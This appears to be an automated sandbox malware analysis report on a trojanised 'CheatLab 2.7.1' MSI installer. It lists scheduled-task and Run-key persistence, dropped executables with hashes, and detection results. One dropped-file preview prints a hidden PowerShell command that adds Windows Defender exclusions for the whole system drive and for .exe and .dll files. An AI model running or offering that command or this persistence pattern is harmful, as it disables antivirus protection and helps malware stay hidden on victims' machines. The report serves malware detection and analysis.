          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 23.202.154.36, 52.168.117.173
          • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, www.microsoft.com-c-3.edgekey.net, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, www.microsoft.com, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          Time | Type | Description
          01:30:00 | Task Scheduler | Run new task: CheatLabTask path: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe s>"C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
          01:30:01 | API Interceptor | 12x Sleep call for process: powershell.exe modified
          01:30:15 | Task Scheduler | Run new task: AMDCheckUpdates_NzEx path: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe s>C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
          01:30:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
          01:30:27 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LuaJIT "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua"
          01:30:55 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
          01:31:25 | API Interceptor | 161x Sleep call for process: LuaJIT.exe modified
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):193727
                                                    Entropy (8bit):6.417439388696864
                                                    Encrypted:false
                                                    SSDEEP:3072:0M6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiz:0BKwXYBWHRuEFW9RzLLhrUmdHDZ19MhO
                                                    MD5:984A52F70A96AEBC8FEAA6E4131024B0
                                                    SHA1:8535EA193801EA817A659B1B4FEE7956EED6210A
                                                    SHA-256:F5923B9A58E5AFB9286F7B78FCC0529E1BE53E6406CD4952D7526C6168D005E4
                                                    SHA-512:04DDCCB2B07E43AA44344695A86CA28A79FC998268EBD1BE0FBBAF29FFA0374ACE1AD6FCD69626192C580EA5D3BE3D72C1683BA924C74A5D33BD1FED735B8CFC
                                                    Malicious:false
                                                    Preview:...@IXOS.@.....@..dW.@.....@.....@.....@.....@.....@......&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}..CheatLab 2.7.1..Cheat.Lab.2.7.1.msi.@.....@.....@.....@........&.{B5CB4318-1D9E-4BE9-AA5C-9BD7E1851AD9}.....@.....@.....@.....@.......@.....@.....@.......@......CheatLab 2.7.1......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7285EAEC-8503-4760-A351-B9914BE2072E}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{782A455A-F17F-4F83-B43B-519E5CD02E50}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{C63D9F59-1705-40C1-B07A-EB81FFC1E687}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@......&.{1C2DE547-5DF6-4AF7-9AB2-B1A94C1961C8}&.{2FA33EFE-BC43-4800-9FEF-38C5B173194D}.@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]L...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in D
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):129927
                                                    Entropy (8bit):6.053213381620977
                                                    Encrypted:false
                                                    SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                    MD5:CEDDECD1649237697C1211B3F9B54EED
                                                    SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
                                                    SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                    SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                    Malicious:false
                                                    Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1159184
                                                    Entropy (8bit):6.055954963040363
                                                    Encrypted:false
                                                    SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                    MD5:1BC7714501F86D5988816461F3637269
                                                    SHA1:4FF12702900CE9F2F68300B75697BA957E481F7E
                                                    SHA-256:EFB4F9570A7078FD687C9F1CEFCFFFC76AB03787636C038C2230912DB43F255A
                                                    SHA-512:4F7797A6FCE9E68E86B718CEF38A894A9A1AA5FEF00CEF55A8D0773C753506012B7194661AB20AEF06AE627B4147F719F89043D9D13FD63C17B5AE21261ACAC5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):128
                                                    Entropy (8bit):4.7202350646624245
                                                    Encrypted:false
                                                    SSDEEP:3:VSJJFIf9IMwEIF2VCceGAFddGeWLCX3AYGeWLERySn/n:s81xB1eGgdEY3AYGWRy0n
                                                    MD5:89DB4CB88ED70579D72B500340691359
                                                    SHA1:5A434F58080EEDFC78B0BA0A49710C6F3EFC5254
                                                    SHA-256:72B2FAA3B9D4FB7CD3E007CF5DFB00D03893B26A6161D6ADE8D003F3D669C57E
                                                    SHA-512:6E47F9F9DB0FCF42489567AD5DA1F1A031FC7423EE2DC79F94CDC3FF249FE18D1E8835D1A26655F4FE5BF58E8525EDBD227B12ED15EFFDDFF51642D57DB1E0BB
                                                    Malicious:false
                                                    Preview:powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.8408235807894398
                                                    Encrypted:false
                                                    SSDEEP:96:CSFTAxCjN/sbhuzxTMbTdQXIDcQvc6QcEVcw3cE/X+HbHg/rZHLnxZOycAYoDIhc:RhN/rT0BU/wjP1zuiF8Z24IO8c
                                                    MD5:037629E0C02A7F33F208500ED24C3DBE
                                                    SHA1:4CFBD657EF9441C672B3D5C8CF779ABEE5EA552F
                                                    SHA-256:027E8F0328F71728CD5A3E10929D39F8FA311CCD5F341B28D763336B046CEB17
                                                    SHA-512:BF4C630B0CE8DC407FF12DCEBA8CF2A084D9B02C3F2FE513A18E7EB72D3589071D05D47BD11D8D46A3BBB56C05BCA7FED21447335FFBE09BDD83811DA89AD910
                                                    Malicious:false
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.4.3.5.3.1.4.5.3.4.1.0.9.1.7.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.4.3.5.3.1.4.5.3.9.6.9.4.1.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.9.f.d.8.3.7.c.-.4.1.9.4.-.4.a.7.7.-.8.c.d.7.-.1.9.2.f.d.c.e.1.a.3.e.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.f.a.b.b.6.c.5.-.c.e.f.4.-.4.8.b.2.-.8.1.b.4.-.8.b.f.6.4.d.3.d.0.4.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.o.n.n.e.c.t...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.5.0.-.0.0.0.1.-.0.0.1.4.-.f.9.d.a.-.8.2.2.5.b.6.0.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.b.d.1.8.d.7.1.f.7.8.f.4.d.a.5.8.5.5.0.7.6.2.3.a.d.6.9.a.c.0.9.0.0.0.0.f.f.f.f.!.0.0.0.0.5.e.2.7.6.9.7.0.e.2.7.d.3.e.0.f.f.1.b.3.5.f.e.9.3.c.1.2.f.5.2.1.d.b.d.9.e.3.3.5.!.c.o.n.n.e.c.t...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 15 streams, Sat Nov 4 00:30:53 2023, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):110944
                                                    Entropy (8bit):3.632695539671375
                                                    Encrypted:false
                                                    SSDEEP:768:JibmiuoPVqBpNNFWt0zE2vrvC6hwfHLTggjA7BM/07+LHDnneB5mOD:JN+upN4uE2aOiLTgVM/0CDyB5mOD
                                                    MD5:AA3AEABEC4F86B3CD13342924CF5712E
                                                    SHA1:2635506BC498A644EF130415A2700C00C8D4D5E8
                                                    SHA-256:D28D0A32CA616D976A158E58E87414C3E1A20D9EFD626C60B661DEE7C1AF449D
                                                    SHA-512:2F7018E2521CCF32906F4BA7C9602309580B833D169CCA5286C709FF39B320CF062850AF6B80A05C4E10D66B8840BD45C27363FC5FC83E630BD2F27F29D886C4
                                                    Malicious:false
                                                    Preview:MDMP..a..... .........Ee............$...............8.......$...........t..../..........`.......8...........T...........X!..........................................................................................................eJ......d.......GenuineIntel............T.......P.....Ee.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):8320
                                                    Entropy (8bit):3.6982141681142355
                                                    Encrypted:false
                                                    SSDEEP:192:R6l7wVeJgjx6TF98v6YVPSU+gmf540gCprf89boHsfZYm:R6lXJKx6Bav6Y9SU+gmf540goMfT
                                                    MD5:E294CB42F45052A139F04724D774957E
                                                    SHA1:E00C3E64A1FC7C389A320F19B3E7AE29128EF3CB
                                                    SHA-256:E84F8742B8A041494A654C5014D3F5CB31E19AC2A11EEC1872DC0637AA175088
                                                    SHA-512:2B812B30038CC4BF5C3079FCB4515E463700487B31A529E7C8386B7308D8DF45E91F54ECC27222F1CC8FF551155712E8CD7AAAB272E53BA10879A51D281E0CC6
                                                    Malicious:false
                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.1.6.<./.P.i.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):4579
                                                    Entropy (8bit):4.461744243179641
                                                    Encrypted:false
                                                    SSDEEP:48:cvIwWl8zs6Jg77aI9ViWpW8VYqYm8M4JpjFGwl+q8nYFMYMKd:uIjfII7nj7ViJSwlJFMYMKd
                                                    MD5:65405514D5B8D137ABDF0995FE5C1684
                                                    SHA1:0086B2A47FD1EFF46B96D6E092AE8B579E40818C
                                                    SHA-256:44C1CA8F62EF7E00F08A104DEE95FEE0131C089484C20663755EAA918DDF28A7
                                                    SHA-512:872DBF3035961CC434533ED6D707F9732A6BDDB9EECDD7AE9F8A3400E9E7AA4C8F3970706AFF3C776EF0BAA6CF73D57FFA1C37A08919E04D9FD20D8F269AA382
                                                    Malicious:false
                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="45573" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):129927
                                                    Entropy (8bit):6.053213381620977
                                                    Encrypted:false
                                                    SSDEEP:3072:dCU9tteOLNPovJDbZyGRKwgu9ZdregF3yDqLS0Fa/csLWDJTETa+S3:lBwKwguUgUsS0FccUW1Tca+S3
                                                    MD5:CEDDECD1649237697C1211B3F9B54EED
                                                    SHA1:4060C06B908CC5B4ED9BD52DBE34685110205BA9
                                                    SHA-256:FAAE54EF7B6D95D51170AF65A46516C95A9D0FBD280350542343E6501CF349B7
                                                    SHA-512:7EC3EFE12EEE64266233A49E701DE7A203C92E346FB657F8E0188F43110B748C2CE13EE49951A16C27DCF16C2718F21A14F55FBEC0B8F677E68CDBBD90052AA1
                                                    Malicious:true
                                                    Preview:.LJ..........-.......8...L.......G.......-...-...4...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........K.......-...-...4...>...>...>...>...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........'.......-...-...4...-...-...D...........$.......-.......B...3...2...L........0.......-...........-...-...)...<...-...L........3.......-...-...4...>...>...>...-...-...D...........$.......-.......B...3...2...L........I.......-...-...8.......<...-...8.......X...-...-...,...<...<...K.........;.......-...-...4...>...>...>...>...>...-...-...D...........$.......-.......B...3...2...L........+.......-...-...4...>...-...-...D...........$.......-.......B...3...2...L........i.......)...:.......X...U...-...-...8...........<...-...8.......X...-...-...,...<...<...8...X...K.........5.......-...-...4...G...?...-...-...D.................$.......-.......B...3...2...L........7.......-...-...4...>...>...>...>...-...-...D...........$.......-.......B...3...2
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1159184
                                                    Entropy (8bit):6.055954963040363
                                                    Encrypted:false
                                                    SSDEEP:12288:Dg8wp/DwJ6HgGnY9jU7rLk8tQy50+WPBdrU4K9Afu2uznkCVAZ0e3B4oQ30:+Lo6HgiY9crLk82+W5vKMu4qa0lRk
                                                    MD5:1BC7714501F86D5988816461F3637269
                                                    SHA1:4FF12702900CE9F2F68300B75697BA957E481F7E
                                                    SHA-256:EFB4F9570A7078FD687C9F1CEFCFFFC76AB03787636C038C2230912DB43F255A
                                                    SHA-512:4F7797A6FCE9E68E86B718CEF38A894A9A1AA5FEF00CEF55A8D0773C753506012B7194661AB20AEF06AE627B4147F719F89043D9D13FD63C17B5AE21261ACAC5
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[l8...V...V...V..fR...V..fU...V..fS...V..fW...V...W.r.V..wS.8.V..wR...V..wU...V...V...V.{wR.\.V.{wV...V.{wT...V.Rich..V.........PE..d...d.d..........".... ............X..........@....................................tC....`.........................................P... ...p...(............P..................|....W..............................@V..@...............P............................text...P........................... ..`.rdata..............................@..@.data...8T.......@..................@....pdata.......P......................@..@_RDATA..\...........................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):2232
                                                    Entropy (8bit):5.379677338874509
                                                    Encrypted:false
                                                    SSDEEP:48:tWSU4y4RFymFoUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:tLHyIFvKLgZ2KRHWLOugYs
                                                    MD5:8C9DF4C6CA842BF517D5D82A38FDF986
                                                    SHA1:90EFA80E03912F3A0D033B3544CF0169A923D4F5
                                                    SHA-256:B9ACF17B9344B625BB13B836DA8F2730864C5A1B9414AE30F1390D2888FB5CC1
                                                    SHA-512:AD1E2766B9DECCD707C4A8EBB39FC62E9FD9AEB02819C0B2C19ABD877AB57E3BA07DD040EDFDF078DB114056DB1D1ADE9A0BC022B2E72E2B2C64D870FEC345F6
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Joe Sandbox View:
                                                    • Filename: Cheat.Lab.2.7.1.msi, Detection: malicious, Browse
                                                    • Filename: Cheat.Lab.2.7.0.msi, Detection: malicious, Browse
                                                    • Filename: file.exe, Detection: malicious, Browse
                                                    • Filename: , Detection: malicious, Browse
                                                    • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                    • Filename: AnyDesk.exe, Detection: malicious, Browse
                                                    • Filename: winrar-611br.msi, Detection: malicious, Browse
                                                    • Filename: Firefox-x64.msi, Detection: malicious, Browse
                                                    • Filename: AnyDeskAPP.msi, Detection: malicious, Browse
                                                    • Filename: 6p2LSuB1em.msi, Detection: malicious, Browse
                                                    • Filename: AnyDesk.msi, Detection: malicious, Browse
                                                    • Filename: MERC_PG_MDLS.msi, Detection: malicious, Browse
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):919520
                                                    Entropy (8bit):6.451406895673526
                                                    Encrypted:false
                                                    SSDEEP:24576:rx90VXSK4fSa6HXr1iWn8Zlv2x4ntHurpllQ6a:Nq4Fb6HXr1iWnYs4ntHurpllQ6a
                                                    MD5:6189CDCB92AB9DDBFFD95FACD0B631FA
                                                    SHA1:B74C72CEFCB5808E2C9AE4BA976FA916BA57190D
                                                    SHA-256:519F7AC72BEBA9D5D7DCF71FCAC15546F5CFD3BCFC37A5129E63B4E0BE91A783
                                                    SHA-512:EE9CE27628E7A07849CD9717609688CA4229D47579B69E3D3B5B2E7C2433369DE9557EF6A13FA59964F57FB213CD8CA205B35F5791EA126BDE5A4E00F6A11CAF
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):60
                                                    Entropy (8bit):4.038920595031593
                                                    Encrypted:false
                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):1070058901
                                                    Entropy (8bit):0.008758649776996388
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A8A24AF1D9E83BE788BD28D64967FE32
                                                    SHA1:BA48D37C5F714ECA8AF108A5508D8AD17FC14BE5
                                                    SHA-256:43ADFA84C5AC7F2A3BD99AD084580A503F17E5060A92D9F4FC6C58E5A59DA266
                                                    SHA-512:45D6DE4473000E09906AD7D359B3E9B3B84D5FFB4AC7E8BE69EA34170E3CD498BCAC96C49109C6EB23ABCFEF0D159B444D42638E5E6A972EB015CEADF2A4141F
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............^..^..^..8^..^..)^.^...^D..^.w.^..^...^..^..^...^..)^..^..<^..^Rich..^........PE..L....=Ce.........................................@.................................................................................................L...H0..............................................................P............................text...=........................... ..`.reloc..W$.......&.................. ..`.rdata..pP.......R..................@..@.data...H....P...t... ..............@....qbjfz..........L...............................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):2072
                                                    Entropy (8bit):3.9566449661490495
                                                    Encrypted:false
                                                    SSDEEP:48:YttajcpXJ0gvxWr6cTnXRfhZa8lMHV9fEgS:styAXPsnBZcuWcgS
                                                    MD5:C4900FFF328F638455C25D11E43B106E
                                                    SHA1:6B86501D2B74ED99BE8BC9453348B4A78243557B
                                                    SHA-256:C6D61CDF586A6C6B51871D10F7D59F47C05C8D9EC1DBE40719EFD20F1B4E23DA
                                                    SHA-512:DB23877A8FD963D30568819B115978840C2A48E593872903035EDF179FBE749193BB5CD5528C07C6B6581E3F7D6475E9097DF9452BA8E4F46FC91CBAEBD0800E
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {B5CB4318-1D9E-4BE9-AA5C-9BD7E1851AD9}, Number of Words: 2, Subject: CheatLab 2.7.1, Author: CheatLab Corp., Name of Creating Application: CheatLab 2.7.1, Template: x64;2057, Comments: This installer database contains the logic and data required to install CheatLab 2.7.1., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                    Category:dropped
                                                    Size (bytes):2820608
                                                    Entropy (8bit):6.925890734266892
                                                    Encrypted:false
                                                    SSDEEP:49152:wIjRd5W8zBQSc0ZnSKxZKumZrDq4Fb6HXr1iWnYs4ntHurpllQ6aBuxtZ0eGisGg:n20ZnHKbFnWnwuxseGiZDal
                                                    MD5:C4ACCA57AD39174BA629781057F491E6
                                                    SHA1:2B2E7AE4386D7C7527636DE18A728719C298E38B
                                                    SHA-256:A62DB9A4B61D64F93C9352820DA477026AB7BA3F0CABE119C201AE0ECBAC82C7
                                                    SHA-512:211585F0F9513262A5402E4E7B131F2ABBF7C72204F1946E7C9F29BE0E1394453FCED3C3FBFCB56A4336B05CA92E30C12D051E68B5CCE00A04B44161A9FE5F53
                                                    Malicious:false
                                                    Process:C:\Windows\System32\msiexec.exe
                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):446944
                                                    Entropy (8bit):6.403916470886214
                                                    Encrypted:false
                                                    SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                    MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                    SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                    SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                    SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                    Malicious:true
